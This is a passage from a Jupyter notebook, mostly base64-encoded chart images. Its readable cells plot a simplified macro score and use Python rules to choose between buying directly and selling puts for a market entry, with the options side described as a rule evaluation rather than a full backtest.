AQCIQRkPBMIBAKBQCAQCAQCgRACMp4JBAKBQCAQCAQCgUAIARnPBAKBQCAQCAQCgUAghICMZwKBQCAQCAQCgUAgEEJQDhtAIBAIBAKhdXjLW94Cr7zyCvs79v/s6emBhQsXwsc//nHYf//9ta7xt7/9DebOnQtbb711yndLIBAIBMLUAUWeCQQCgUDIGM4880z461//CnfccQf88pe/hD322AM+8pGPwD333KP1+//5n/8JK1asSP0+CQQCgUCYSqDIM4FAIBAIGcPAwADMmTOH/X3evHlw+umnw/Lly+G8886D3/72t+2+PQKBQCAQpiQo8kwgEAgEQg5wzDHHwDPPPAMvvvgiPPfcc3DyySfD7rvvDosWLYL3ve99sHjxYpv2jTjhhBPgwgsvZH+///774cgjj4RddtkFDjvsMLj11lvb+iwEAoFAIOQRZDwTCAQCgZAD8PxlNJxPOeUU2GSTTeDGG2+Eq6++Gmq1GnzjG99gP7/22mvZ/9Fw/sAHPsAi1kj5RuMZo9Yf/OAH4fOf/zwzqAkEAoFAIOiDaNsEAoFAIOSEyo0YGhqCY489lkWbe3t72WdHHHEE/OhHP2J/nzVrFvv/9OnToa+vDy699FLYZ5994LjjjmOfb7755vDkk0/Cz372M9hzzz3b9jwEAoFAIOQNZDwTCAQCgZADbNiwgf2/v78f3vrWt8INN9wAjz32GDz//PPwxBNPwODgoPL38Oe33347o3hzTExMwJZbbtmyeycQCAQCoRNAxjOBQCAQCDnA008/zf6PdO2jjjoKZs6cyfKbDz30UGYg//jHP1b+3uTkJMtzRqq3iHKZVAACgUAgEKKATk4CgUAgEHKA6667DnbaaSd49dVXYdmyZSx/mRvA2Naq0Wgofw8jzA899BCja3OgoT0+Pu4xqAkEAoFAIPiDCoYRCAQCgZAxrF+/nhX6QiMZI87nnnsu3HzzzazQ14wZM2B4eBhuu+02WLJkCfzqV7+CK6+8khnDHJgL/eyzz7LrYG400rv/7//+D1544QVmdH/729+G+fPnt/UZCQQCgUDIGwoNP1c1gUAgEAiElgOp2K+88gr7e6FQYAXAdtxxRxYl5gW+LrroImYwj42NwcKFCxmN+wtf+ALccccdrC80Gsc//elPWWGxM888E+655x745je/yVpd4c9POukku4AYgUAgEAgEPZDxTCAQCAQCgUAgEAgEQgiItk0gEAgEAoFAIBAIBEIIyHgmEAgEAoFAIBAIBAIhBGQ8EwgEAoFAIBAIBAKBEAIyngkEAoFAIBAIBAKBQAgBGc8EAoFAIBAIBAKBQCCEgIxnAoFAIBAIBAKBQCAQQkDGM4FAIBAIBAKBQCAQCCEg45lAIBAIBAKBQCAQCIQQkPFMIBAIBAKBQCAQCARCCMh4JhAIBAKBQCAQCAQCIQRkPBMIBAKBQCAQCAQCgRACMp4JBAKBQCAQCAQCgUCAYPx/HM7C7jSJ4pQAAAAASUVORK5CYII=", + "text/plain": [ + "
" + ] + }, + "metadata": {}, + "output_type": "display_data" + } + ], + "source": [ + "fig, ax = plt.subplots(figsize=(12, 4))\n", + "macro_score.dropna().plot(ax=ax, color=\"#10b981\", linewidth=1.6)\n", + "ax.axhline(0, color=\"#64748b\", linestyle=\"--\")\n", + "ax.axhline(2, color=\"#22c55e\", linestyle=\":\", label=\"risk-on zone\")\n", + "ax.axhline(-2, color=\"#ef4444\", linestyle=\":\", label=\"risk-off zone\")\n", + "ax.set_title(\"Macro Score (6-indicator card, simplified)\")\n", + "ax.legend(loc=\"upper left\")\n", + "plt.show()" + ] + }, + { + "cell_type": "markdown", + "id": "244badf5", + "metadata": {}, + "source": [ + "## 4) 执行层:买入方式对比(direct buy vs sell put)\n", + "\n", + "### 决策逻辑(当日)\n", + "\n", + "在“方向允许 + 有效性通过 + 宏观不过差”的前提下:\n", + "\n", + "- **direct buy**:适合价格不离谱、趋势确认较强\n", + "- **sell put**:适合价格偏高或短期波动偏高,追求更低接盘成本\n", + "\n", + "这里先做“规则评估”,不做完整期权回测(完整回测需期权链、成交与保证金模型)。" + ] + }, + { + "cell_type": "code", + "execution_count": 10, + "id": "cc61ff9f", + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "entry_allowed: True\n", + "execution_mode: SELL_PUT\n", + "dev_ma20_pct: 3.85\n", + "vol20_ann: 0.2359\n" + ] + } + ], + "source": [ + "decision_df = val.join(macro_score, how=\"left\").ffill()\n", + "decision_df[\"dev_ma20_pct\"] = (decision_df[\"close\"] / decision_df[\"close\"].rolling(20).mean() - 1) * 100\n", + "\n", + "d = decision_df.dropna().iloc[-1]\n", + "base_ok = int(d[\"base_long\"]) == 1\n", + "valid_ok = int(d[\"valid_long\"]) == 1\n", + "macro_ok = float(d[\"macro_score\"]) >= -1\n", + "\n", + "entry_allowed = base_ok and valid_ok and macro_ok\n", + "\n", + "if not entry_allowed:\n", + " exec_mode = \"NO_ENTRY\"\n", + "else:\n", + " high_dev = float(d[\"dev_ma20_pct\"]) > 4.0\n", + " high_vol = float(d[\"vol20_ann\"]) > float(val[\"vol20_ann\"].rolling(252).quantile(0.75).dropna().iloc[-1])\n", + " exec_mode = \"SELL_PUT\" if (high_dev or high_vol) else \"DIRECT_BUY\"\n", + "\n", + "print(\"entry_allowed:\", entry_allowed)\n", + "print(\"execution_mode:\", exec_mode)\n", + "print(\"dev_ma20_pct:\", round(float(d[\"dev_ma20_pct\"]), 2))\n", + "print(\"vol20_ann:\", round(float(d[\"vol20_ann\"]), 4))" + ] + }, + { + "cell_type": "code", + "execution_count": 11, + "id": "9edd49d9", + "metadata": {}, + "outputs": [ + { + "data": { + "image/png": "iVBORw0KGgoAAAANSUhEUgAAA94AAAFvCAYAAAC8ZBPSAAAAOnRFWHRTb2Z0d2FyZQBNYXRwbG90bGliIHZlcnNpb24zLjEwLjAsIGh0dHBzOi8vbWF0cGxvdGxpYi5vcmcvlHJYcgAAAAlwSFlzAAAPYQAAD2EBqD+naQAA5W9JREFUeJzsnQWcHOX5x5/Z3fO75CyuxEOMJECQQCC4e2lxKMWKlBYp0pbi0j/FixR31+JOcEgCSUhC3OUuFzmX3fl/fu/MOzs7O7Pu+3zzuc/l9uZmZ+edeed97PcoqqqqxDAMwzAMwzAMwzBMUnAlZ7cMwzAMwzAMwzAMwwA2vBmGYRiGYRiGYRgmibDhzTAMwzAMwzAMwzBJhA1vhmEYhmEYhmEYhkkibHgzDMMwDMMwDMMwTBJhw5thGIZhGIZhGIZhkggb3gzDMAzDMAzDMAyTRNjwZhiGYRiGYRiGYZgkwoY3wzAMk1GoqpruQ2CYpMDXNsMwTP7iSfcBMAzDMInnr3/9K7366quOv6+traUvv/ySMo1FixbR3/72N3ruueeM10aOHEnnn38+XXDBBUl/f7yXFbfbTRUVFTRmzBj605/+ROPHjxevf/vtt3TKKafQE088QVOmTAm772i3B6tXr6Z99tkn4DVFUaikpIS22247OuGEE+jYY4+lbCERn+fuu++me+65hxYuXJjUY33llVfoiiuuCLnN22+/TUOHDo1of/fddx8VFhbSmWeeSanm5JNPFt+ffPLJlL83wzAMo8GGN8MwTI7So0cPYaDYUVBQQJnIu+++S7NmzQp47fnnn6fevXun7Bhg+B133HHGzx0dHcIhcP/999Ppp58ujhHnFoY4jm3YsGFJP6Zzzz2X9tprLyNq2tzcTC+++CJdddVV1NXVRb/97W8pm4jn82Bs9thjj5QdK+4hjLcd/fv3j3g/d955p3AgpYN//OMfaXlfhmEYxg8b3gzDMDkKoms77LADZTup/gww8q3vufPOO9OAAQPoD3/4A73//vt04oknUnl5ecqObeDAgUHvtdtuu9GCBQvoscceyzrDO57Pg/FJpSNm9OjRURnYmUgqnEMMwzBMaLjGm2EYJo+ZO3euiNwiNV2yadMm2nXXXUV0V9akrl27lv785z8LA3TChAl06qmn0i+//BKwr6amJrruuutENBJG1THHHEOffvppQBo30oTN4GeZ3i1TiK3bWv9u48aNIgV42rRpIu0bEeqPPvooYL/4m6efflpEUHHMEydOpIsuuojq6+tjPlfdunUzUqNl6jjeB99BW1sbXXPNNbTnnnvS2LFj6cADD6SHH37YcX+IpJ9xxhki7Xz+/PlRH4/L5RJGIcZGpnHjeB599FHx3hinl19+Wfxuzpw59Pvf/16816RJk+icc84RUXwJIrHjxo2jpUuXGq/hnGP/3333Hd1yyy3iXDc2NgalT0+ePJlaW1uN97eOcaI/j/makbz22mt01FFHiW0QSf+///s/cX4lv/76K5199tnis+Prj3/8I61atYoSAa77vffeWxyjfE/cNygr2H333amhocE4Xlzf5mMPd1zyGvv666/FtYLPh33edttt5PV6je1QNvKb3/xGXOc77bSTyChYsmRJQKq5TDcH7e3tdO+994pjxrjvv//+9OCDD5LP5wv4G9w/eB3nFNvBIfLzzz8n5LwxDMPkG2x4MwzD5DBI27X7kgY1DEREcVEPjsU9+Pvf/y4W4DfffLMwMmE4YME9b948UX8Nowa/R9RXLu5hBMAwePPNN4UhAYNsyJAhwpD44YcfIjpWpBDL+l6kcJvTvSUwnLEN9nnxxRcLI6xfv37ifd54442Abf/973+L47z99tvpsssuo08++YRuvPHGsMeBvzGfK6RBz5w5k/75z3+KWm9rjbIE+/7888/p8ssvFwY3trv11lsN49c6Ljh+OD4eeeQRYXDGwrJly0T02AzOCcYU7w0j7ZtvvqHf/e53xjFef/31tG7dOjGmcvzgMCgtLTVSknFcSK3HmMJxgXMOYw1p9mZef/11Ovjgg0WNds+ePR3HLZGfxwocLDjncCDBsD3rrLNELTM+p9wnPiscSnAg3HDDDcK4xTnBa9FeD/JLGqnIfMA+ly9fLs4ZQB0/jGac7+rqanFeAM6j/H80x3XJJZcIBwf2f+ihh9J///tfkZoP8DfnnXeeuJf/85//iP1g3zgPZkNagnsfjhfsA2OFfcIAv+OOO4JS0t977z3h1Lr66qvFfYT7D1oLZqOfYRiGiQxONWcYhslR1qxZI4wRO2CIIgIKYLR+/PHHwrDEYv3DDz8U9ai9evUSv3/88cdpy5Yt9OyzzwojFyCqC4ML2911113C4Pzpp59EFG3fffcV2+yyyy7CKIDht+OOO4Y9XnMKsVMKN6KfcATAIJDHgsj3aaedJgwzGCWInIIRI0bQTTfdZPwtInVWw9EOOA3wZU3bx2eAISXPixVEhmEYHnLIIeJnRJdhzNbU1ARsB2MIGQYwzPB5nMbI+jcw9uT/N2zYIIxLpGbDaDZz0EEHiWwDCQylQYMGicglhOLA1KlTab/99hNjhzGE2B6MLjgDYNBhzHH+kCUAICCGaCoMbWlYwxkBYxMOGnmOIk29j+fzWPcjrzlpaANE4P/3v/9RZ2enMMbhGEAKO4xkgIwO/A2MTxjtocB5sgNR4AceeMBIkz/++OPFOUZUGkYqHFO4NoE8L+YyhmiOC+cc96ncBvcosklkBBrZFnB4yWsT7wODuaWlxdi3BPfqV199JY5RXqu4bouLi8W1gEj98OHDxesYIziR5D7ghMJxIUMDhj7DMAwTOWx4MwzD5CgQhEIEzI4+ffoECK0h4obFPVJLkbKLCJgEkXBEZLGol8YSjFsY3zLK/OOPP4r9TJ8+3fg7bGNWJ08EMG5hAEqjW3L44YeL9HOkSst6VqsRCGMEBlk4kLKLL0QGYQgirRfRRkT6y8rKHP8OhjY+7/r164XBhS9pLJn517/+JSLK+B3SdyMB44IvM4i+I6UYBp8Zc/QchhfSzJFKLo1umTaP9OjPPvvMeA2OFDgmkPEAIxqq3vgugfGLjAc4dHD+kSUBJXKMR7TE+nmsILKL6LDVOIZTSTqW4PhB1B6Gpbx+YUjCkQIDNBy4h+zE1WTpgdmZNWPGDBFNxnnBz6GI5ris5xjXMsYWwNAvKioS0XTct7gvcS1K9X27e8jj8QTc4/IeguGN30vDG/eS2XCXhn0k9xHDMAwTCBveDMMwOQqMpkgNOxg3qCWFQQiDzAyi3StWrHCMzGIRjm0qKyuNaHOy2Lp1qxA5s4KILdi2bZvxGqKJZnBskfRRRsq0PG8wXvB+qHdHKzFENGWNtxUYkjCI4IxArTu+YDAhgjtq1KgAYxF1uIgqw8h0iqCbgeEsVcDxOWCkQvDL7nwjyi5BTTY+szw/ZvCatWYbThdkEwwePFgYj2ZgmCPij6g3jNp33nlHZEjEQqyfxwquO2DNKrBug7Zf+LKCNPBwIPIfibganDKolUbpAKLSMKhDEc1xWfdlvpZxbE899ZS4Nl966SWR5g6nAFqz4Zq1Xq+4h6qqqgIcMUA6F8zXhN09BOxS2BmGYZjQsOHNMAzDiLpTGN0wEFEjCsNBRvRgFCEy5xTBg4GPbWBIwBgwL/QhwIbXpNFurQ2VUbtI6d69O9XV1QW9Ll+DQZFocC5gxKCW+IUXXgiKyJrPAyK2+IJAGGrKkbL+l7/8RaQ9S2CQ43wihRrp/da0djsQYY7UiWIG44LxsBOVwzmDs8TsQEFqPgxNiH7BgDT3nIZhiSgpDG5sg7E74ogjoj6meD6PFXmNovzAzObNm8W1B8cHzgFSweE8sYLIb6LAOUO6PJxYKMtABBnRaCcSeVxwECF1HeJuyD7B/YzabdzPuM6s9xDOD+5Fs/EN0cJk3UMMwzAMi6sxDMPkPUgdRqo5UlWxWEfEC8a3BEYiorSIgMJYkl+IfCLChsU70mNRT4v6UQkMbqR/yzpYpKyiltcM6oTNhIuYI1KMPt84ZjOIMiNih1rmZIDaZ0SIURcro6xmUGN7wAEHCGMV9O3bV9T4ooZWqnRLsB8cK1TiUYcLQzZZIFqMWly8h9npgTFGjTBS6CVIpUeaPMTMTjrpJFH/bVbGBrhGYGAiWg+jMZJofTKBgB8MRTg5zODaRDQe1ySu38WLFwuDWF67OCeorf7ggw8SchxIFUfdPoThUG4Agxe10BCkc7q2E3Vc2B5ZKjC64fyBowjOHWC99uT74nitegeybMR8TTAMwzCJgw1vhmGYHAUL8dmzZzt+IcIJ4xgp0kgpRUQbtd9IT0V7JgiuAQiXIbUU35EWi5pv1PoiuifTkZE2jOgijA9E21Cjiv/DcJNRU2yDyC8ME+zj0ksvFSnsdhHMt956y7bdE6KDiNLiWGBcoUYZRjHqZfE9WanuiE5i/zC6UQdrBanAUlUb5wV1sjgPqIOGQW4HhLEQEYWTA+m/yQIRd6lyDUMfBhfaweH6kDXoOF6kK+NnpJnjGkC6M8bQbLDDKMOYY/ujjz7a9nqD8Z4q4PSBeBwcCzA20VYLnwNOAzg+EN2F4vfKlSuF+BhEyb744gvxN7gWzSUATkBIzOkekpkWcFghwg6BN1wLOBa8J5T1zdc2HE3ff/+9uO/iPS4JRAxxHBg73A+oM4fDC0a4tWwEyBpwKJXDUYR7FYrmyLxAqQH3/GYYhkkOnGrOMAyTo2Ax7pQWDWBcwxCAEYyFN4wU2b8XbcEgsoXewohqwlhGRBT1yojiwTiDwSjbf8EAeuihh4RwGAxTGPWoGcfCXoo8wRhApA3RdaTSomYYRiEMAAlqZGFQw+DDvq0K14gUI40XxwIjBxFNGCkwGpzafCUKiIvBmMaX3Xm99tprxXnEZ8a5R90xPoNUBrcCJwH+BvvFOYmk1VksIAIK9XQYo4iyS4V2vCdEtJAyjrFB+rgUJENaOcYfafNQ2IZxKIEDBandUr3enKqM84L6bRiQqQIGNiL7UN/G2KDOHu3H8AVwfaBMAEYwnEswevFZoYYeyTWDz+MEzhsMXxjeaAOG+wXACQN1cGQGQPgNDguIruE6xXHBgRXvcUmwH7w//g7jC0cJIue4DpERYAWlB8hCwfWAaDnGEnXi+Fu7tHeGYRgmMShqJEozDMMwDMPkPVgyIH0e7ciuvPLKdB8OwzAMw2QNHPFmGIZhGCYkTU1NIjqK1mQoAUBWBMMwDMMwkcOGN8MwDMMwIUHdMsoNUOuPlHi7lm4MwzAMwzjDqeYMwzAMwzAMwzAMk0RY1ZxhGIZhGIZhGIZhkggb3gzDMAzDMAzDMAyTRNjwZhiGYRiGYRiGYZgkwoY3wzAMwzAMwzAMwySRnFE1r6trTPchMGGori6jhobmdB8GEwM8dtkLj132wWOWnfC4ZS88dtkLj132UZ2DY9ajR0VE23HEm0kJikLkdrvEdya74LHLXnjssg8es+yExy174bHLXnjssg8lz8eMDW+GYRiGYRiGYRiGSSJseDMMwzAMwzAMwzBMEmHDm2EYhmEYhmEYhmGSCBveDMMwDMMwDMMwDJNE2PBmGIZhGIZhGIZhmCTChjfDMAzDMAzDMAzDJBE2vBmGYRiGYRiGYRgmibDhzTAMwzAMwzAMwzBJhA1vhmEYhmEYhmEYhkkibHgzDMMwDMMwDMMwTBJhw5thGIZhGIZhGIZhkggb3hnMscceRlOn7ii+9thjJ9pvvz3o3HPPoG+//Toh+5858wex70j5+OMPafPmBvH/hx9+gM4//yzKVNatWys+2777TqX29vag3//nP3eL37/99psBr7e2toq/Oe+8M233+9VXM+i0004QY3Hqqb+lGTM+C/j9Bx+8S7/5zRG0zz670xVXXEJbtmwJeZw4n2eccRJ1dXWJ97788otp//2n0ZVXXkrt7W0B73vFFX8J+NvOzk4644wTjTFhGIbJFLo6iN69102fPOqizWvTfTQMwzAMk37Y8M5wLrzwL/T66+/Sq6++TQ888CiNGzeBLrvsT/T999/GvW/sC/uOhPXr19Hf//5XamvTjMHf/e5kuvHG2yjTgUH7ww/fBb3+xRefkqIoQa/DkK6pqaU5c36iNWtWB/xu8eJFdNVVl9IhhxxOjz76DB1++NF09dWX06JFv4rf//LLXLr55uvo9NP/QA888Bg1Nm6jG2+8JuTx3XffXXTMMb8hj8dDb775mjDU//vfx6mubiO98cZrxnaPPvqQ2K+ZgoICOuaY48U+GIZhMomGNUQblii0co6L/nenmzr8fkSGYRiGyUvY8M5wysvLhSFYW9uDhgwZRueddxHtu+/+dPfdt8e9bxhu2HckqKoa8HNpaSl169adMp0JEybRjBmfB7y2fPkyamlpoZ49ewVt/+GH79Eee+wlzvW77/4vKJo9adJOdNxxv6X+/QcIg3nSpB3p448/EL9/+eUXaPr0/eiggw6lYcOG09/+di19/fWXtHbtGseo/BdffEb77Xeg+HnlyuVifwMHDqbJk3eiFSuWi9exj9raWhoxYlTQPvbf/yDx+eAYYRiGyRRaG/2OTW+nQo31aT0chmEYhkk7bHhnIYi0Ll26hFavXiV+bmxspOuu+5tIUT7iiAPp3/++1UhTPuus00RauJlzzjmDHnvsv0Gp5j//PJvOPff3Ik0a6daXXHIh1ddrq6Xjjjvc+I70bGuq+dy5P4u/xd9hm9dee8n43Q03XEN33XU7/elPf6Lp03eno48+JMioNaeAW1PYH3jgXrroovPE/z/66H363e+OpunTd6OTTjqOPv/805Dnao899qSvvvoiwHGAaDeMa2vEe9u2bfTdd9/QDjtMpN12m0rvvvt2wN/BoD7nnPOD3qO5uUl8nzdvLk2YMNF4vVev3uJr3rw5tsf2+uuv0JQpu1BhYaGx/eLFv4ooPaLo+BlgrKzRbrPzZKedpoh9MQzDZAqtjYE/N28OzjBiGIZhmHwibw1v2FOd7an7sgSM42Lw4O3E9+XLl4rvN998LTU1NdF//vMw3XTTv2j+/F/o9ttvFb9DdPyzzz42/ra+vk4Ygvvue0DAPvH3SGHfeedd6MknX6Dbb7+HVq9eTU899aj4/UMPPW5832ef/YIiyBdeeC7tsMMkeuSRp+iMM86ie+65gz777BNjG0SDx4wZQ08++TxNmzadbrvtRvGeVnC8cACY65Y//fQj8Tpeu+66v9PJJ59OzzzzMh188OF0zTVX0bZtWx3P1Y47ThGG8fz584zXPv/8E9pzz2lB237++cfkcrnE3+yxxzRat24N/fTTrIDzPnz4CONnOD9+/PF7mjx5Z/Hzpk31IjPBTFVVtUgbt+Pbb78SRrPksMOOEpFrOBWwryOOOFrU81dVVdlGuyXYB/bFMAyTKbSZIt6geXPaDoVhGIZhMgIP5SEwgt+52011y1Pnge+5nUoHnu8lm7LiqCkrKxffkS6NOmSkK7/99sciLR1cfvnVdPrpJ9AFF/xZpD7DCF61aiUNGDBQGLHDh48UqdIbN24w9okI+amnnkm//e2JIhLct28/2muv6YbBWllZZXwvKioOOJ4333yVRowYSWef/UfxM1KlYYw/88wTNG3a3uK1YcNG0B/+8Aeqr2+kM888m1588VlatmyJqDM3g2PDcSKSDcNzyZLFIiUb+4FRimhwjx49qXfvPvS7350kUroLC4scz1VRURHttNMuIh17++3HCiMYDoWJE4NF5T744H1hxBYXF9Po0WNEKvo777wlHApWUIt99dWXieOHkS7PoYxeS/BzR0dH0N/jc+CzDRqkOVG0c1tJTzzxvHAwVFfXiNcee+wh+tOfLhNR+nvvvYtKS0vor3/9W4AhDocA6s+9Xi+53W7Hc8EwDJMqWi1+1SYR8U6gB5phGIZhsoy8jXgnwgBOFy0tzeJ7aWmZMHB9Ph8dddRBQmkbX+ecc7p4DanoiMCOH78DffqpFvXGd0SPraDWG6nUzz//tIgq//73J9Ozzz4pjLlwLF++nLbffkzAa+PGjacVK5YZPw8YMCDIcQDj0w44C2S0HI4CGMOoJ4dRjhTwiy/+I51wwjEiLb1Pn77CUA4FDOMvv9TqvOGk2G233YWYmRlEmGfP/lGkoAM4H/bccy/65JOPDEE5SUPDJrroonPI51PpuutuEVFyJyMbP9sdH4TXMEbdu1cGvI73lUb3999/Iz734MGD6aabrqNrr72RTj3193T99f8I+Jvu3buLfYWK/DMMw6SSNj3VvFsPzdhuDt3ggWEYhmFyHk++Gt2IPqPdSarwFCbO2Ed0EwwZMlT8H5Hu//73yaDtevTQ0p5haL/11ht06KGHC7Xuq6/+Z9C2iASfeebJNHLkaJFqffjhR4kWVk71yWasUV7g9frEl8TjKQgr2CZBGvyTTz4qateRJg8FdWmU3nrrHUI9HBFspIy/+upLdN99Dwmj3InddtuDbrnlel3M7FM68shjbFulwclw6603iC95fDBo8T4QMZPn6cILzxH/v+eeB0QauKS2tqcwys3gZ3sBO+1iwP6dePTR/9JFF10iHBuIZCPKPWjQYLrqqstEmr7McIADQDs/eetHYxgmw2hr0ua4mgEqbatTuMabYRiGyXvydqUOI7igKHVfiYyw/+9/bwgDGengAwcOEkYYjFKkj+MLfavvvfdO6ujoFNvvtde+QrQL7aqQQo00bSswLisqugvD9je/+Z0QCTOrcdu13pLgGCAsZmbevJ/F67EA43Lw4CH02msvi6g9Is8AKt9Im0fK+FlnnSdq0Xv16hW2rzlSuMeOHU/vv/+OSJ2fMmW3oG0g2oZa7Ucffdr4euyxZ6hfv/4i3Rygz/Zf/nKBiHDfc8+DQfXcY8aMFfXpkg0b1ot0/jFjxgW9H6LUMKa3brWPUqMFWkVFBY0cOYpcLoVUVTPQZQaC2WmxdesWsS/sk2EYJpPE1WoHanNVE9d4MwzDMHlOXka8swkY1UiDhp0FA+utt14XRuK//32vUd8LQ/Kf/7yaLr74UnK53CK6261bN2G4ScMTbbCefPIx+sMfzrV9H6Q0w1CEwYf07U8++VBEm0eN2l78vri4RHyHAW9Njz7qqOPoxRefE+rjSFdHlPyVV16kiy++LObPvc8++9MTTzwiPptMTUeEF2rp+I4I9LJlS0UUO5TwmGTq1GmiF/bkyTsGpX5jH1Blv+66m0UbMTOoM7///ntEpBufCTX1d9+tqcRjXABq3nFMRx11LF1wwdk0duw4GjVqDN15579EajwcJFZgvA8dOpyWLFlEEybsEPR7KJmff/7F4v/9+w8UaflIu1+3bp1wTMixBch6QI19KOcIwzBMOlLNaweohtiat5PIHZz8xDAMwzB5ARveGc5dd/2f+IJRBWEzGJl33nl/gLGGftFoIYaWW4h8TpmyqzDCzSDd/IcfvhX103bgdSh4X3315eK9Ro/ens4//0+ibRjqlGG8H3DAQfT3v19B5557QcDf9u7dm2699d9033130nPPPSXaYMFoPOQQrQVZLOB4H3jgnoB6dKRs33DDbaK2+4knHhVp3meffb5QYg8H6rzvvfcOo4bbzIcfvi8+H4xzK1BO/+9/7xetxeCIQDYBWrSZgbPhqquuEVH1Sy+9UmyPGm6Iul1++VWOx4RxQoT86KOPC3gdbd5Qvz9q1Gjxc0lJidgvlOrxurVUAPvYZZfdw54DhmGYVIAyrs52zRFY2RulVip1dSiizrtbYKIQwzAMw+QNiupUaJtl1NVZmoYyGQWCsbW1FULVPDeuuPhB9Pz3vz+JXnvt3bACcU4g/R3Ceo8++ozIVEgGPHbZC49d9pELY9bUQPTy9R5yuVU66VYvvX6rm7ZuUGi/c7zUd0SWfqg8GLd8hccue+Gxyz6UHB2zHj38maihyNsab4ZJN6gf33XXqaL2PFbwtxCPS5bRzTAME2t9d0mFtsiSyuab16b3uBiGYRgmnbDhzTBp5I9//JOoHe/s1ITwogF/g7/94x8vSsqxMQzDxKNoXqwHAHoM0gzvuhWsQ8EwDMPkL1zjzTBppLa2Vqinx0JBQQE9/vizCT8mhmGYRAirFZdrBjcb3gzDMAzDEW+GYRiGYRJIW7P2vbhM+14zACnnKrVs0QTWGIZhGCYfSWnE+5VXXqErrrgi6HWoaC9YsCDo9cMPP5wWLlwY8Nqbb75JI0aMSOpxMgzDMAwTGx0tWmS7SDe8C4qIKvtoNd71KxUqq8whRR2GYRiGyUTD++CDD6Y99tjD+Bm9iU899VTaa6/gFk9er5eWL19OTz31FA0ePNh4HS2kGIZhGIbJTNpbtO+FpX4DG+nmm9cqtGGJQoPGs+HNMAzD5B8pNbzRMsncNumBBx4gdDO75JJLgrZdvXq1EI8aP348FRUVpfIwGYZhGIaJ0/AuKvW/1nekSr9+TbT6F4V2OlJTO2cYhmGYfCJtNd5btmyhhx56iP7yl79QYWFh0O8XL15Mffr0YaObYRiGYbKIdplqbja8R6iir3fjJoW21aXv2BiGYRgm7wzvZ599lnr27EkHHnig7e+XLFkiVJvPPvts2n333emkk06in3/+OeXHyTAMwzBM5HTYRLwLiol6DdVSzBH1ZhiGYZh8Iy2GN9LLX3zxRWFMO7Fs2TLaunUrHXfccfTggw/S0KFDRT34unXrHP8GqWu58rV+/VqaOnVH8d3u92+//SYde+xhEe3rkUceoAsuOCuu40nEPsANN1wjviLZvqWlmd599y3jZ3xefO5knO9PPvmQtmxpSNhnTdV5xTUya9YPtr/D6/h9Io4z1+6vfPriscu+r0wbMyiRf/mcS4ijRbK9kWpepga8PmCM3/BO92fKh3HjLx67fPjiscu+L5CLnylj+3jPmTOHNmzYQIcccojjNtdddx21tbVReXm5+Pmaa66hmTNn0uuvv07nnHNO0PbV1WXkdudOd7S2Nk0OtqqqjGprK4J+f/zxR9Nhhx1I1dXBv7NSWlpEBQUe2/1ESiL2Aa699hrxvaIi/H6ee+5x+vbbb+nkk38nfn711VeotLQ0QCcgEaxZs4b+9re/0kcffSQ+X6I+ayQk4r26dy+1/Xu8DhL1OWpqkn8+mOTAY5d9ZNKYLZrRSYu/6yK3UkCHnR9cGmalo6VVfO/Tv4y61/qfy+N399F3r7bThqUuKi8ppeKy3It8Z9K4MdHBY5e98NhlHzV5OmZpMby/+OIL2nHHHal79+6O23g8HsPoli3HhgwZIgx2OxoamqPyOGQ6mzc3G9+Lixsdtiqg+nqn3/lpaWmnzs6uiLZN1j4wNrjJOjqQ8UDU3h5+P83NbZb3LKCmpk7xlUgaGpoCznUizlekJOK9tm5tsf17vA7i/Rxy7DZtahRjx2QPPHbZRyaOWcNGGM8uWrcUc1V7yG27Ooi6OrWlRXN7M3XWm37pJurey01bNyg056tm2m5ihnzAHB03JjJ47LIXHrvsQ8nRMYs0yJUWwxu12pMmTQq5zcknn0xTpkyh888/X/zs8/lET+8TTzzR8W9yaQDlZ/nss0/o5ZdfoE2b6mnHHXemq676J3Xr1k2kXD/yyIP00ktviu0WLJhPt99+Cy1evIhGjBgptp09eybdc8+DYl9o3favf91C7733thCsO/HEU+i3vw2V6r+Ubr31Bvr11wU0Zsw4Gjx4O7EfeVw//TSL7rrrdrFd//796YwzzqK99tqHVqxYTieeeCy98MLr1LdvP7HtqlUr6YQTjqFPPvmEbrnlX+K1q666RpQcPPnko/Tmm69RXd1G6t69ko444mixL+3zPSS23X33HWnGjB9Eqjl+d/DBh4nr4bnnnqJXX31ZnJsxY8bSn/50KQ0dOkz8DVKs//a3a+mppx6j1atX0ejRY+jqq/9pHJOZY4893Ph+5ZX/CHu+zj//LPE+X331JXm9XfTUUy9QY2OjOP8//PAdVVVVi2M89dTfk9vtFvv6v/+7mT7//BPq6OigSZN2pEsuuYJ69OgZ9r3CfU55reCrubmJbr31RvrqqxlUU1NLhx9+ZMC1FC/m8WeyCx677COTxqxN803StnqijjatL7fjtprPmBSXSp7C4M/Qf3tVGN6r5ik0eIcM+YA5Om5MdPDYZS88dtmHmqdjlpbc7EWLFtGwYX7DQfbtrqurE4YJmD59Oj322GMi/Xfp0qV07bXXCuPmqKOOStyBtLVpX+aR7+rUXuvstN/W5zNt26W9ph9zyG1j5J13/kf//OeNdNddD9DChQvo6acfD9qmqamJLrnkAho5cjQ99tjTtN9+BwiD1sycOT+LlOZHH32aTjrpVLrnnjto+fJltu+JMbjssj8JI/WRR54WBvXrr79i/B4GIH5/8MGH0hNPPEcnnngq3XDDP4UxPmjQYBo2bIRwGEg+/fQjGjduvFCpN/Puu/+jF154li6//Gp69tlX6PTTzxTOBHzOffbZTxifY8eOp9dffzfoGB999CF69tmn6KKL/kyPPPIU9e7dh/7ylwuotVVLcQQPP/yAMFIffvhJ2roVKvr/sf28Dz30uPEd7xvJ+YJj4O9/v5ZuvPFfVFJSSldddZkwuLE9jPcPPnjXGIOXX36eZs2aSbfffi/9979PUktLi3BaRDI2kXxOyW233UQrVy4XzpaLL76UnnvuadvPyzAMEw3SmCZVEXXekbYSs8tC67+99lxcs0BJxCOSYRiGYbKGtBje9fX1ImprBqJpU6dOpVmzZomfTzvtNDrzzDPp+uuvpyOOOEK0F3v00UcD0s/jpeCME8QXNW4zXnO99bp4zf2YFm2VeM49Xdt2kz9vzvXBO9q2D94buO1F52jbrl0d9zGed96FIlqLSOf06fuKiLaVjz56Xxh/f/rTJTRw4GA65pjjhbFsBtHVCy74M/Xr15+OP/5EKi+voCVLgvcFELWFsB2isjCkjz76ONpzz72N37/yyosioo736d9/AB1wwMF0+OFH0QsvPCN+v88++9Nnn31sbP/JJx/R9OmaQWumV6/ewkjFvvr06UtHHnks1dTU0LJlS6ioqJhKSkpEyQGit2YQKUcWwJlnnkNTp04T0XgY7y6XS0SNJfickyfvREOGDBP7nj//F9vPW1lZZXzH+